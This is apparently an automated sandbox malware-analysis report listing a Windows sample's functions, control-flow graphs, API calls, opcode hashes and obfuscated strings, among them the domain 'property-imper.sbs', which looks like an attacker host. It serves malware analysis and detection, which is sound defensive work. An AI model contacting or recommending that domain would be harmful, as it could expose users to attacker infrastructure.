                              control_flow_graph 118 2fcf05-2fcf12 119 2fcf20-2fcf5c 118->119 119->119 120 2fcf5e-2fcfa5 call 2f8930 call 329030 119->120 125 2fcfb0-2fcffc 120->125 125->125 126 2fcffe-2fd06b 125->126 127 2fd070-2fd097 126->127 127->127 128 2fd099-2fd0aa 127->128 129 2fd0ac-2fd0b3 128->129 130 2fd0cb-2fd0d3 128->130 133 2fd0c0-2fd0c9 129->133 131 2fd0eb-2fd0f8 130->131 132 2fd0d5-2fd0d6 130->132 135 2fd11b-2fd123 131->135 136 2fd0fa-2fd101 131->136 134 2fd0e0-2fd0e9 132->134 133->130 133->133 134->131 134->134 138 2fd13b-2fd266 135->138 139 2fd125-2fd126 135->139 137 2fd110-2fd119 136->137 137->135 137->137 141 2fd270-2fd2ce 138->141 140 2fd130-2fd139 139->140 140->138 140->140 141->141 142 2fd2d0-2fd2ff 141->142 143 2fd300-2fd31a 142->143 143->143 144 2fd31c-2fd36b call 2fb960 143->144 147 2fd370-2fd3ac 144->147 147->147 148 2fd3ae-2fd3c5 call 2f8930 call 329030 147->148 152 2fd3ca-2fd3eb 148->152 153 2fd3f0-2fd43c 152->153 153->153 154 2fd43e-2fd4ab 153->154 155 2fd4b0-2fd4d7 154->155 155->155 156 2fd4d9-2fd4ea 155->156 157 2fd4ec-2fd4ef 156->157 158 2fd4fb-2fd503 156->158 159 2fd4f0-2fd4f9 157->159 160 2fd51b-2fd528 158->160 161 2fd505-2fd506 158->161 159->158 159->159 163 2fd54b-2fd557 160->163 164 2fd52a-2fd531 160->164 162 2fd510-2fd519 161->162 162->160 162->162 166 2fd56b-2fd696 163->166 167 2fd559-2fd55a 163->167 165 2fd540-2fd549 164->165 165->163 165->165 169 2fd6a0-2fd6fe 166->169 168 2fd560-2fd569 167->168 168->166 168->168 169->169 170 2fd700-2fd72f 169->170 171 2fd730-2fd74a 170->171 171->171 172 2fd74c-2fd791 call 2fb960 171->172
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: ()$+S7U$,_"Q$0C%E$1A3C5A9CB541A822D7CBBD6DF28D3732$7W"i$;[*]$<KuM$N3F5$S7HI$property-imper.sbs$y?O1$c]e$gy
                              • API String ID: 0-925830438
                              • Opcode ID: 8f477ccf1d2426281e919e131445cb61005e18ffa5406aa45fb8b779d0ad1521
                              • Instruction ID: 96890c8ec350d6594eafe5c6df6ffaf88bd08a824fceb9d4fe16747920779896
                              • Opcode Fuzzy Hash: 8f477ccf1d2426281e919e131445cb61005e18ffa5406aa45fb8b779d0ad1521
                              • Instruction Fuzzy Hash: 0B121EB15583C68ED3358F25C495BEFFBE2ABD2304F18896CC4DA5B256C770090ACB92
                              Function 002F89A0 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 203 2f89a0-2f89b1 call 32cb70 206 2f89b7-2f89cf call 326620 203->206 207 2f8cb3-2f8cbb ExitProcess 203->207 211 2f8cae call 32deb0 206->211 212 2f89d5-2f89fb 206->212 211->207 216 2f89fd-2f89ff 212->216 217 2f8a01-2f8bda 212->217 216->217 219 2f8c8a-2f8ca2 call 2f9ed0 217->219 220 2f8be0-2f8c50 217->220 219->211 225 2f8ca4 call 2fce80 219->225 221 2f8c56-2f8c88 220->221 222 2f8c52-2f8c54 220->222 221->219 222->221 227 2f8ca9 call 2fb930 225->227 227->211
                              APIs
                              • ExitProcess.KERNEL32(00000000), ref: 002F8CB6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: c6779f4e862f807658b4e3108dc50bb74b84832ae78fdc2c9c0e9422dfd878d8
                              • Instruction ID: 2b28d1c01dc2020860de0689f8151178e1f4fb5661d1875c6d668866bae56959
                              • Opcode Fuzzy Hash: c6779f4e862f807658b4e3108dc50bb74b84832ae78fdc2c9c0e9422dfd878d8
                              • Instruction Fuzzy Hash: 06710573B547050BC70CDEBADC9236BF6D6ABC8714F09D83D6988DB390EAB89C054685
                              Function 0032DF70 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 234 32df70-32dfa2 LdrInitializeThunk
                              APIs
                              • LdrInitializeThunk.NTDLL(0032BA46,?,00000010,00000005,00000000,?,00000000,?,?,00309158,?,?,003019B4), ref: 0032DF9E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                              Function 0032B7E0 Relevance: 1.5, APIs: 1, Instructions: 49memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 229 32b7e0-32b7ff 230 32b800-32b83d 229->230 230->230 231 32b83f-32b85b RtlAllocateHeap 230->231
                              APIs
                              • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0032B84E
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 50493cf6301814da4beab4b6e627a83a1baf88742d07f832d1985d2a8ed5bf30
                              • Instruction ID: 73c7f8417231fb65aea1adcead5207470b03d887a0cce191eee344c602ae426b
                              • Opcode Fuzzy Hash: 50493cf6301814da4beab4b6e627a83a1baf88742d07f832d1985d2a8ed5bf30
                              • Instruction Fuzzy Hash: F4017633A457180BC301AE7CDC9464ABB96EFD9324F2A063CE5D4873D1DA31990A8295
                              Function 002FCEB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 233 2fceb3-2fcee2 CoInitializeSecurity
                              APIs
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 002FCEC6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: InitializeSecurity
                              • String ID:
                              • API String ID: 640775948-0
                              • Opcode ID: ac99b37ff8c97d55cca157d106588f0098b09b27bb8556b998fb04a92079035d
                              • Instruction ID: fcf9045644cb2b75c459b3e2b54238c6a2a6e0bf1d777b4594a087a2ce8cf6bb
                              • Opcode Fuzzy Hash: ac99b37ff8c97d55cca157d106588f0098b09b27bb8556b998fb04a92079035d
                              • Instruction Fuzzy Hash: 59D012357E8742BAF9798608ACA3F2422198706F68F305B08B332FE2E2C9D07142850C
                              Function 002FCE80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 232 2fce80-2fceb0 CoInitializeEx
                              APIs
                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 002FCE94
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: Initialize
                              • String ID:
                              • API String ID: 2538663250-0
                              • Opcode ID: 5c511be5bbb2ad09224f0b903549db7951a37c5bad1eccffe0aa01cba6b8d629
                              • Instruction ID: ca09d98975e744d4fea1cbdb68ff78e017069b62ab6b31669e76d72f3b0512c4
                              • Opcode Fuzzy Hash: 5c511be5bbb2ad09224f0b903549db7951a37c5bad1eccffe0aa01cba6b8d629
                              • Instruction Fuzzy Hash: CED0A7212A46487BD118A21CEC97F27365D8703754F445636A662CA2D2D95169158065
                              Function 002FD7D2 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 276 2fd7d2-2fd7d8 CoUninitialize 277 2fd7da-2fd7e1 276->277
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: Uninitialize
                              • String ID:
                              • API String ID: 3861434553-0
                              • Opcode ID: 48a59fa3c8f708484433f095e3d362d40dff9596cc1c5e972a09ac2fc74dae2e
                              • Instruction ID: b979425f5eaf5565cf15aaee525b351b37829593de3ad8fb6037f78017de3eb6
                              • Opcode Fuzzy Hash: 48a59fa3c8f708484433f095e3d362d40dff9596cc1c5e972a09ac2fc74dae2e
                              • Instruction Fuzzy Hash: 92B01237B41008544B0014A47C010CDF318D2801357006B73C21CD2000D62601244180

                              Non-executed Functions

                              Function 00313D70 Relevance: 24.3, Strings: 19, Instructions: 515COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                              • API String ID: 1279760036-1524723224
                              • Opcode ID: 72c0c279ce8485589524f096fc6ce72a14f3a86d21518e8677f31aa923fbc2d4
                              • Instruction ID: 27d464040fabb4c33dd56adf730c4a675d693c1531125e3a42ed32d53a477367
                              • Opcode Fuzzy Hash: 72c0c279ce8485589524f096fc6ce72a14f3a86d21518e8677f31aa923fbc2d4
                              • Instruction Fuzzy Hash: D3228EB550C3808FD32A8F28C4943AFBBE1AB99314F194D2DE5D98B392D7758885CB53
                              Function 002F94D0 Relevance: 17.9, Strings: 14, Instructions: 385COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: n[$8$=86o$BDZF$N$RHL9$SD]z$ZS$_CYG$f)2s$mmi.$p8Bb$txfF$u{{h
                              • API String ID: 0-1787199350
                              • Opcode ID: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction ID: 5c3658a3dc5b696bd327294873b1296c567e58bebb1790a9eb90b1b5d73abe6c
                              • Opcode Fuzzy Hash: 4f528f0c90cc623b71a293a4037b626f3364ba5f16f27244a2274f38ff2d6f74
                              • Instruction Fuzzy Hash: 54B1E57011C3858FD3158F2980607ABFFE1AF97784F1849ACE5D58B392D779884ACB92
                              Function 002F98F0 Relevance: 11.7, Strings: 9, Instructions: 428COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 1A3C5A9CB541A822D7CBBD6DF28D3732$DG$Ohs,$chs,$fhnf$fhnf$xy$su${}
                              • API String ID: 0-3908739105
                              • Opcode ID: c1b3168ba76250f4877fc23b92db1f1a7c23e11126551f3ee85181df081104a2
                              • Instruction ID: 45494c6f77e3729239939b697b64b3165134c2abfbe825dbb49589e98df06851
                              • Opcode Fuzzy Hash: c1b3168ba76250f4877fc23b92db1f1a7c23e11126551f3ee85181df081104a2
                              • Instruction Fuzzy Hash: 41E13772A583548BD328CF35C89176BFBE6ABD1314F198A3DE5E58B391D6348805CF82
                              Function 004BEF5B Relevance: 10.3, Strings: 7, Instructions: 1594COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: -]$7o$:g-$@0kk$kq{<$kq{<$v_
                              • API String ID: 0-3521022252
                              • Opcode ID: 254d8d95d9ed893f44b8fbba7698ea423bee6b3b93d6c4f489a960a359645d79
                              • Instruction ID: 1b19daa4ce33d1ce8272943710471bd8b1b71f3d069a5a1d1dbfa229f56986e8
                              • Opcode Fuzzy Hash: 254d8d95d9ed893f44b8fbba7698ea423bee6b3b93d6c4f489a960a359645d79
                              • Instruction Fuzzy Hash: 0DB2E6F360C2009FE3046E2DEC8567AB7E9EF94720F1A893DEAC4C3744E67598458697
                              Function 004C5982 Relevance: 9.2, Strings: 6, Instructions: 1656COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
